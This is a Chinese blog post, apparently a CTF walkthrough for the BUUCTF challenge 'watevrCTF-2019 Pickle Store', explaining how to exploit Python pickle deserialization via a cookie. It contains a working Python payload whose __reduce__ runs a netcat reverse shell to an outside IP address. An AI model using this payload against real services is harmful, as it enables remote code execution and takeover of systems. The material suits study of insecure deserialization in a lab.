您现在的位置是:首页 > 正文

BUUCTF:[watevrCTF-2019]Pickle Store

2024-02-01 05:39:25阅读 2

题目地址:https://buuoj.cn/challenges#[watevrCTF-2019]Pickle%20Store
在这里插入图片描述
Pickle反序列化
在这里插入图片描述
使用pickle.loads()和base64对这串字符进行解码反序列化
在这里插入图片描述
利用Pickle反序列化exp反弹shell
在Buu的小号上开一台内网靶机
在这里插入图片描述

import base64
import pickle

class A(object):
    def __reduce__(self):
        return (eval, ("__import__('os').system('nc 174.2.124.251 9999 -e/bin/sh')",))
a = A()
print(base64.b64encode(pickle.dumps(a)))

在这里插入图片描述
靶机nc监听:
在这里插入图片描述
将生成的base64序列化字符串,放入cookie刷新即可
在这里插入图片描述
在这里插入图片描述

网站文章

  • 阿里云网盘和百度网盘功能体验上谁更胜一筹呢?

    阿里云网盘和百度网盘功能体验上谁更胜一筹呢?

    阿里云网盘和百度网盘功能体验上谁更胜一筹呢?由阿里巴巴推出的阿里云网盘即将上线,相信这对于百度网盘来说将是一个强劲的对手,会流失许多的用户。那么阿里云网盘和百度网盘哪个好?这两个网盘在功能和体验上谁更...

    2024-02-01 05:39:18
  • Element级联选择器自定义value label

    Element级联选择器自定义value label

    实际项目中后端返回的数据属性可能不是以`label/value`等命名的,这时候数据就渲染不上去。我们需要利用`props`指定选项的值为选项对象的某个属性值。

    2024-02-01 05:38:47
  • LeetCode-160. 相交链表

    LeetCode-160. 相交链表

    于是有一个巧妙的思路诞生了,如果让短的先走完自己的再走长的,长的走完走短的,他俩就会正好对齐。如果让他们尾端队齐,那么从后面遍历就会很快找到第一个相交的点。

    2024-02-01 05:38:21
  • 2021-07-23

    2021-07-23

    com.mysql.jdbc.exceptions.jdbc4.CommunicationsException: Communications link failure遇到这个问题,刚开始很懵,于是疯狂百度,大多数都是让修改等待时间,但对我来说无济于事,然后就想着修改代码,于是,发现成功啦!上图:另:数据库版本和驱动jar包不一样,就在注册驱动时找到jdbc的上级目录为止...

    2024-02-01 05:37:47
  • 初学Java Web(3)——第一个Servlet

    初学Java Web(3)——第一个Servlet

    这学期 Java Web 课程的第一节课就简短复习了一下 Java 的一些基础知识,所以觉得 Java 的基础知识还是很重要的,但当我想要去写一篇 Java 回顾的文章的时候发现很难,因为坑实在太多了(一个头,两个大),只能另外找一些时间去写顺便巩固巩固自己的基础。——【1. 什么是 Servlet 】——学习一个东西就要先去了解它是什么东西。Servlet 取自两个单词:Se...

    2024-02-01 05:37:40
  • 杰理之mic 到dac功能【篇】

    杰理之mic 到dac功能【篇】

    8888

    2024-02-01 05:37:32
  • js 数组倒序排列 热门推荐

    js 数组倒序排列 热门推荐

    js倒序排列

    2024-02-01 05:37:02
  • 不用if、switch、问号表达式判断两个数大小

    //不用if等语句判断两个数大小 #include<stdio.h> void main() { int a,b,c,d,e,flag; printf("please input...

    2024-02-01 05:36:57
  • 定西扶贫惠农推介系统(ssm+jsp+mysql)

    定西扶贫惠农推介系统(ssm+jsp+mysql)

    开发环境:风定落花生,歌声逐流水,大家好我是风歌,混迹在java圈的辛苦码农。今天要和大家聊的是一款基于ssm的定西扶贫惠农推介系统。

    2024-02-01 05:36:49
  • 【毕设选题】基于单片机的智能避障超声波跟随小车 - 物联网 嵌入式

    【毕设选题】基于单片机的智能避障超声波跟随小车 - 物联网 嵌入式

    🔥 这两年开始毕业设计和毕业答辩的要求和难度不断提升,传统的毕设题目缺少创新和亮点,往往达不到毕业答辩的要求,这两年不断有学弟学妹告诉学长自己做的项目系统达不到老师的要求。为了大家能够顺利以及最少的精力通过毕设,学长分享优质毕业设计项目,今天要分享的是🚩基于单片机的智能避障超声波跟随小车🥇学长这里给一个题目综合评分(每项满分5分)难度系数:4分工作量:4分创新点:3分。

    2024-02-01 05:36:44